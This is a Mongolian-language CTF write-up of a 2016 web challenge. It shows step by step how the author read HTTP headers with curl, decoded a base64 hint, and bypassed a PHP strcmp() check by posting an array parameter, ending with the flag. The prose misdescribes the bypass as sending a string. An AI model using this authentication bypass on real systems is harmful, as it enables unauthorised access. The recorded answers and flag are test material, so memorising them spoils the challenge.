Толгой 40 Оноо

2016 оны 9-р сарын 23-нд Мэдээллийн аюулгүй байдал ангилалд нийтэлсэн.

2 минут уншина.

Өгөгдөл

Даалгаврын нэр: Толгой
Хандах хаяг: http://103.48.116.193:8008/
Оноо: 40 оноо


Энэ даалгаврын хувьд тэмцээний үеэр хийж чадаагүй бөгөөд толгой (Header) дээрээс ямар нэгэн зүйл олохоос өөр санаа байсангүй.

Тэмцээний маргааш нь curl ашиглаж header-үүдийг харж болохыг мэдсэн бөгөөд тугийг олж чадсан юм.

$ curl -I http://103.48.116.193:8008/

асуулт 1: Харуул Занги эхний тэмцээн болсон он? /хариултаа илээр явуулна уу. ‘answer_level_one’ /

гэсэн хариу ирэх бөгөөд илээр гэдэг нь get хүсэлтийг хэлж байна. Харуул занги анхны тэмцээн 2013 онд болсон бөгөөд дахин curl ашиглаж үзье.


$ curl -I http://103.48.116.193:8008/?answer_level_one=2013

Найдвар: aDRydVVMLVpAbkcxXzIwMTY= /хариултыг илээр явуулна уу. ‘answer_next_one’/

Өгөгдсөн base64-г тайлъя.

$ base64 -D <<< "aDRydVVMLVpAbkcxXzIwMTY="

h4ruUL-Z@nG1_2016 гэсэн тэмдэгт мөр гарч ирлээ.


$ curl -I http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016

Учрыг ол : hint php strcmp() /хариултыг далдаар явуулна уу. ‘answer_level_last_one’/

http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016 хаяг руу хандаж үзвэл input форм харагдана. Өгөгдсөн hint-г уншвал шалгалтаа strcmp() функц ашиглаж хийдэг бололтой. strcmp-г bypass хийхийн тулд тэмдэгт мөр хэлбэрээр хүсэлт явуулахад л болно.

$ curl -d "answer_level_last_one[]=a" http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016

FLAG: HZ{0nly_4rrAy_p4$$_1t}

Эцэст нь туг: HZ{0nly_4rrAy_p4$$_1t}